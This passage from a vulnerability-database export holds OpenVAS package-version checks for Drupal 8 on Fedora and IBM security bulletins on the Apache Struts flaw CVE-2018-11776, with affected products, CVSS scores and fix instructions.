script_tag(name:\"last_modification\", value:\"2019-05-17 10:04:07 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-08 02:09:58 +0000 (Wed, 08 May 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-1a3edd7e8a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-1a3edd7e8a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the FEDORA-2019-1a3edd7e8a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Drupal is an open source content management platform powering millions of\nwebsites and applications. Its built, used, and supported by an active and\ndiverse community of people around the world.\");\n\n script_tag(name:\"affected\", value:\"'drupal8' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.15~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-922cc2fbaa", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6924", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6923", "CVE-2017-6920", "CVE-2017-6929", "CVE-2017-6921", "CVE-2017-6930", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6925"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874383", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_922cc2fbaa_drupal8_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874383\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:34 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6923\", \"CVE-2017-6924\", \"CVE-2017-6925\",\n \"CVE-2017-6920\", \"CVE-2017-6921\", \"CVE-2017-6922\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S4QXGSUTNGLGN67JM5KBVWO26ICKTRXL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.3.9~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2023-02-21T21:47:35", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Spectrum LSF Explorer.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Spectrum LSF Explorer 10.1\n\nIBM Spectrum LSF Explorer 10.2\n\n## Remediation/Fixes\n\n_&lt;Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**IBM Spectrum LSF Explorer10.1 &amp; 10.2**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Explorer installed environment.\n 3. How to find replace files location\n * Navigate to Explorer installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Spectrum LSF Explorer", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "href": "https://www.ibm.com/support/pages/node/729453", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:34", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Platform Application Center.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nPlatform Application Center 9.1.5\n\nPlatform Application Center 9.1.4.2\n\nPlatform Application Center 9.1.4.1\n\nPlatform Application Center 9.1.4\n\nPlatform Application Center 9.1.3\n\nPlatform Application Center 9.1.2\n\nPlatform Application Center 9.1.1\n\nPlatform Application Center 9.1\n\n## Remediation/Fixes\n\n_&lt;Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nPlatform Application Center\n\n| \n\n_9.1.5_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.3_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**Platform Application Center 9.1.5, 9.1.4.2, 9.1.4.1, 9.1.4, 9.1.3, 9.1.2, 9.1.1, 9.1**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to PAC installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Platform Application Center", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "href": "https://www.ibm.com/support/pages/node/729451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T17:45:43", "description": "## Summary\n\nA vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and 9100 family products. Apache Struts is used in the Service Assistant GUI. The Service Assistant CLI is unaffected.\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: ** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \nIBM FlashSystem 9100 Family \nIBM Spectrum Virtualize Software \nIBM Spectrum Virtualize for Public Cloud\n\nAll products are affected when running supported versions 7.5 to 8.2.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM FlashSystem V9000, IBM Spectrum Virtualize Software, and IBM Spectrum Virtualize for Public Cloud to the following code levels or higher:\n\n7.5.0.13\n\n7.8.1.8\n\n8.1.3.3\n\n8.2.0.2\n\n8.2.1.0\n\n[_Latest IBM SAN Volume Controller Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Storage%20virtualization&product=ibm/StorageSoftware/SAN+Volume+Controller+%282145%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V7000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V7000+%282076%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V5000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V5000&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3700 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3700&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3500 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3500&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem 9100 Family Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+9100+family&release=All&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize Software_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+software&release=8.1&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize for Public Cloud_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+for+Public+Cloud&release=8.1&platform=All&function=all>)\n\nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of code.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-03-29T01:48:02", "id": "709EFBBA0822EBB77C07CD194232C954374F9FDFBE66E10E5A72224A58470EAA", "href": "https://www.ibm.com/support/pages/node/741137", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:28", "description": "## Summary\n\nIBM Security Guardium has addressed the following vulnerability. \n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected IBM Security Guardium**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Security Guardium | 10.1.4-10.5 \n \n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Security Guardium | 10.1.4 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&amp;fixids=SqlGuard_10.0p413_Apache-Struts-Vulnerability-Fix&amp;source=SAR&amp;function=fixId&amp;parent=IBM%20Security \nIBM Security Guardium | 10.5 | https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FInfoSphere+Guardium&amp;fixids=SqlGuard_10.0p512_Sep-24-2018&amp;source=SAR&amp;function=fixId&amp;parent=IBM%20Security \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-28T04:30:01", "type": "ibm", "title": "Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-28T04:30:01", "id": "B7DFEA0F0D26A9AEA7F776C2117CB1186584920235B808CDC32E52053CB3C6B0", "href": "https://www.ibm.com/support/pages/node/732783", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T05:46:06", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 840 and 900 are susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system. \n \n\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nFlashSystem 840 machine type and models (MTMs) affected include 9840-AE1 and 9843-AE1. \nFlashSystem 900 MTMs affected include 9840-AE2 and 9843-AE2.\n\nSupported code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \nFlashSystem 840 MTMs:\n\n9840-AE1 &amp; 9843-AE1\n\nFlashSystem 900 MTMs:\n\n9840-AE2, 9843-AE2, 9840-AE3, &amp; 9843-AE3\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n| N/A | FlashSystem 840 fixes and FlashSystem900 fixes are available @ [IBM's Fix Central](<https://www-945.ibm.com/support/fixcentral>) \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-02-18T01:45:50", "id": "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "href": "https://www.ibm.com/support/pages/node/735035", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:56", "description": "## Summary\n\nContent Collector for Email, File Systems, Microsoft SharePoint and IBM Connections has addressed publicly disclosed vulnerability found by vFinder: Eclipse Jetty.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector for Email - 4.0.1 \nIBM Content Collector for File Systems - 4.0.1 \nIBM Content Collector for SharePoint - 4.0.1 \nIBM Content Collector for IBM Connections - 4.0.1\n\n## Remediation/Fixes\n\n**Product** | **VRM** | **Remediation** \n---|---|--- \nIBM Content Collector for Email | 4.0.1 | \n\nUse IBM Content Collector for Email 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for File Systems | 4.0.1 | \n\nUse IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) 